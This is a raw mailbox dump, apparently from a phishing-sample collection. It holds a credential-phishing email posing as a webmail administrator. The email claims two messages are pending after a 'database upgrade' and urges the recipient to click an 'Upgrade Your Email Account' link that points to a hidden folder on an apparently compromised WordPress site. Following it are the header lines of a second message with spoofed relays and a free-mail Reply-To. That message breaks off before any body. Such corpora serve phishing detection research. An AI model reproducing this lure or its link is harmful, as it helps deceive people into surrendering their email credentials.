From: "Webmail Admin" <test@bendida.lt>
Date: Sun, 22 Nov 2015 23:24:37 -0500
Reply-To: webmailupdate1000@gmail.com
Status: O
X-Status: 
X-Keywords:                  
X-UID: 258

You will not see this in a MIME-aware mail reader.
--===============2101438520==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 Dear jose@monkey.org =

 Your two incoming mails were placed on pending status
due to the recent database upgrade,
In order to receive the messages =

follow the link below to Upgrade your email Account. =

 Upgrade Your Email Account Sincerely,
Mail Service Team. =A92001 - 2015 Administrator. All Rights Reserved.	 =



--===============2101438520==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><H4>
<P align=3Dcenter>Dear jose@monkey.org </P>
<P align=3Dcenter>Your two incoming mails were placed on pending status<BR>=
due to the recent database upgrade,<BR>In order to receive the messages <BR=
>follow the link below to Upgrade your email Account. </P>
<P align=3Dcenter><A style=3D"COLOR: blue" href=3D"http://cebuwoodland.com/=
wp-content/themes/woodland/scripts/cache/.cache/" target=3D'_blank"'>Upgrad=
e Your Email Account</A> =

<P align=3Dcenter><SPAN class=3Do>Sincerely,<BR></SPAN><SPAN class=3Dk>Mail=
 Service Team. =

<P align=3Dcenter><FONT color=3Dblue>=A92001 - 2015 Administrator. All Righ=
ts Reserved.</TD> </P></FONT></SPAN></H4></BODY></HTML>
--===============2101438520==--

From jose@monkey.org Mon Nov 23 05:25:09 2015 +0000
Return-Path: postmaster@ict-kontum.gov.vn
Delivered-To: jose@monkey.org
X-FDA: 70884726654.09.join40_2c38f2d039b48
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 50,3,0,9fdfc992080e4be7,d41d8cd98f00b204,postmaster@ict-kontum.gov.vn,,RULES_HIT:41:379:387:539:540:541:542:543:560:567:599:871:988:989:1000:1155:1254:1260:1308:1309:1313:1314:1381:1437:1516:1518:1538:1567:1575:1587:1594:1711:1714:1730:1747:1764:1777:1792:2073:2076:2194:2198:2199:2200:2393:2559:2562:2731:2890:3041:3138:3139:3140:3141:3142:3421:3623:3865:3868:3870:3872:3873:4042:4321:4361:4362:5007:6261:6506:6747:6748:7281:7398:8671:9108:9941:10010:10264:10394:10400:11604:11658:11914:12050:12217:12219:12225:12231:12517:12519:12555:13071:13870:14659:21063:30001:30007:30023:30028:30048:30054,0,RBL:93.87.61.218:@ict-kontum.gov.vn:.lbl8.mailshell.net-62.8.197.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:none,Custom_rules:0:2:0,LFtime:12,LUA_SUMMARY:none
X-HE-Tag: join40_2c38f2d039b48
X-Filterd-Recvd-Size: 1447065
Received: from mail.primanova.rs (mail.primanova.rs [93.87.61.218])
	by imf19.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 23 Nov 2015 05:25:03 +0000 (UTC)
Received: from User (unknown [84.19.27.87])
	by mail.primanova.rs (Postfix) with ESMTPA id EABC11647406;
	Mon, 23 Nov 2015 04:12:30 +0100 (CET)
Reply-To: <anissamona_almnajjed@outlook.com>
